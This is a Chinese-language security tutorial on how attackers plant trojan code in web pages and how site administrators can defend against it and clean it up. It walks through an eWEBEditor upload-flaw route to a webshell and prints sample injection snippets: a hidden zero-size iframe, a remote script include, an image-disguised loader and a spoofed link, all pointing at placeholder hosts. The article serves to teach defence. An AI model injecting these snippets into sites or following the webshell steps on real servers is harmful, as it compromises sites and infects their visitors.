在网页中挂马和清除木马的方法

网页挂马是攻击者惯用的入侵手段，其影响极其恶劣。不仅让站点管理者蒙羞，而且殃及池鱼使站点的浏览者遭殃。不管是站点维护者还是个人用户，掌握、了解一定的网页挂马及其防御技术是非常必要的。
　
　　1、关于网页挂马
　
　　网页挂马就是攻击者通过在正常的页面中（通常是网站的主页）插入一段代码。浏览者在打开该页面的时候，这段代码被执行，然后下载并运行某木马的服务器端程序，进而控制浏览者的主机。
　
　　2、获取Webshell
　
　　攻击者要进行网页挂马，必须要获取对站点文件的修改权限，而获取该站点Webshell是最普遍的做法。
　
　　其实可供攻击者实施的攻击手段比较多，比如注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞都可被利用。下面就列举一个当前比较流行的eWEBEditor在线HTML编辑器上传漏洞做个演示和分析。
　
　　1）.网站入侵分析
　
　　eWEBEditor是一个在线的HTML编辑器，很多网站都集成这个编辑器，以方便发布信息。低版本的eWEBEditor在线HTML编辑器，存在者上传漏洞，黑客利用这点得到WEBSHELL（网页管理权限）后，修改了网站，进行了挂马操作。
　
　　其原理是：eWEBEditor的默认管理员页面没有更改，而且默认的用户名和密码都没有更改。攻击者登陆eWEBEditor后，添加一种新的样式类型，然后设置上传文件的类型，加入asp文件类型，就可以上传一个网页木马了。（图1）
　

 

　　2）.判断分析网页漏洞
　
　　（1）.攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似"ewebeditor.asp？id="语句，只要类似的语句存在，就能判断网站确实使用了WEB编辑器。
　
　　（2）.eWEBEditor编辑器可能被黑客利用的安全漏洞：
　
　　a.管理员未对数据库的路径和名称进行修改，导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。
　
　　b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆。或者是默认密码。直接进入编辑器的后台。
　
　　c.该WEB编辑器上传程序存在安全漏洞。
　
　　分析报告指出：网站的admin路径下发现cer.asp网页木马，经分析为老兵的网页木马。（加密后依旧能通过特征码分辨，推荐网站管理员使用雷客ASP站长安全助手，经常检测网站是否被非法修改。）

    3、揭秘几种最主要的挂马技术
　
　　（1）.iframe式挂马
　
　　网页木马被攻击者利用iframe语句，加载到任意网页中都可执行的挂马形式，是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下：
　

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> 

　　解释：在打开插入该句代码的网页后，就也就打开了http://www.xxx.com/muma.html页面，但是由于它的长和宽都为“0”，所以很难察觉，非常具有隐蔽性。下面我们做过做个演示，比如在某网页中插入如下代码：
　

<iframe src=http://security.ctocio.com.cn width=200 height=200></iframe> 

　　在“百度”中嵌入了“IT专家网安全版块”的页面，效果如图2。

 

　
　　（2）.js脚本挂马
　
　　js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术，如：黑客先制作一个。js文件，然后利用js代码调用到挂马的网页。通常代码如下：

<script language=javascript src=http://www.xxx.com/gm.js></script> 

　　http://www.xxx.com/gm.js就是一个js脚本文件，通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成，攻击者只需输入相关的选项就可以了，如图3就是一个JS木马的代码。（图3）
　

 

　　（3）.图片伪装挂马
　
　　随着防毒技术的发展，黑手段也不停地更新，图片木马技术逃避杀毒监视的新技术，攻击者将类似：http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中，这些嵌入代码的图片都可以用工具生成，攻击者只需输入相关的选项就可以了，如图4.图片木马生成后，再利用代码调用执行，是比较新颖的一种挂马隐蔽方法，实例代码如：

<html>
<iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe>
<img src="http://www.xxx.com/test.jpg"></center>
</html> 

注：当用户打开http://www.xxx.com/test.htm是，显示给用户的是http://www.xxx.com/test.jpg，而http://www.xxx.com/test.htm网页代码也随之运行。（图4）

 

（4）.网络钓鱼式挂马
　
　　网络中最常见的欺骗手段，黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页，利用社会工程学欺骗方法，引诱点击，当用户打开一个看似正常的页面时，网页代码随之运行，隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信息，然后窃取个人隐私相关联。比如攻击者模仿腾讯公司设计了一个获取QQ币的页面，引诱输入QQ好和密码见图5。
　

　　等用户输入完提交后，就把这些信息发送到攻击者指定的地方见图6。

　　（5）.URL伪装挂马
　
　　高级欺骗，黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术，当用户访问木马页面时地址栏显示www.sina.com或者security.ctocio.com.cn等用户信任地址，其实却打开了被挂马的页面，从而实现欺骗，示例代码如：

<p><a id="qipian" href="http://www.hacker.com.cn"></a></p>
<div>
<a href="http://security.ctocio.com.cn" target="_blank">
<table>
<caption>
<label for="qipian">
<u style="cursor;pointer;color;blue">
</u>
</label>
</caption>
</table>
</a>
</div> 

　　上面的代码的效果，貌似security.ctocio.com.cn是一个如图7的链接。

如果点击却打开了http://www.hacker.com.cn，如图8。

　　总结：上述的挂马方式都是利用了系统的漏洞，并且挂马的代码不用攻击者编写，都是实现了工具化、傻瓜化。技术门槛比较低，因此危害也特别大。
　
　　4、网页木马的防御和清除
　
　　1）。防御网页木马，服务器设置非常重要，反注册、卸载危险组件：（网页后门木马调用的组件）
　
　　（1）.卸载wscript.shell对象，在cmd先或者直接运行：regsvr32 /u %windir%/system32/WSHom.Ocx
　
　　（2）.卸载FSO对象，在cmd下或者直接运行：regsvr32.exe /u %windir%/system32/scrrun.dll
　
　　（3）.卸载stream对象，在cmd下或者直接运行：regsvr32.exe /u /s "C：/Program Files/Common Files/System/ado/msado15.dll"注：如果想恢复的话只需重新注册即可，例如：regsvr32 %windir%/system32/WSHom.Ocx 2）。

    清理网页挂马
　
　　如果站点中的多个页面被挂马，如果手工一个个清理那几乎是不可能的。笔者推荐“雷客图ASP站长安全助手”，其实它也算是个Webshell，利用其提供功能可以清除网页中的挂马代码。
　
　　（1）.查找ASP木马：“雷客图”可以基于特征码对站点内的文件进行扫描，然后找到asa、cdx、cer等格式的可疑文件，管理员可以据此确定进行判断确定是否删除。（图9）
　

　　（2）.文件篡改检测：入侵者进入web之后往往会修改一些文件，利用这个功能就是在平时提取文件信息以备检查篡改，这个功能对于定位网页挂马文件非常方便。
　
　　（3）.清除网页挂马：这是“雷客图”的辅助插件，黑客入侵网站之后可能利用脚本在特定页面添加恶意代码（一般是用iframe标签指向其他网址）。由于其使用脚本一次可以修改n个文件，清理起来十分不便，该功能就是批量脚本的逆向，清理挂马非常方便。
　
　　雷客图ASP站长还有很多功能，比如数据库保护、可疑文件搜索、SQL防注入等。需要说明的是，使用其一定要更改它的默认用户名和密码。
　
　　总结：小心被网页挂马所伤，不仅是对浏览者而言，更是针对网站的维护者。只有网站管理者加固站点的安全，从源头上杜绝网页木马，才能为用户提供安全的浏览环境。当然，个人用户掌握一定的安全技能也是非常必要的。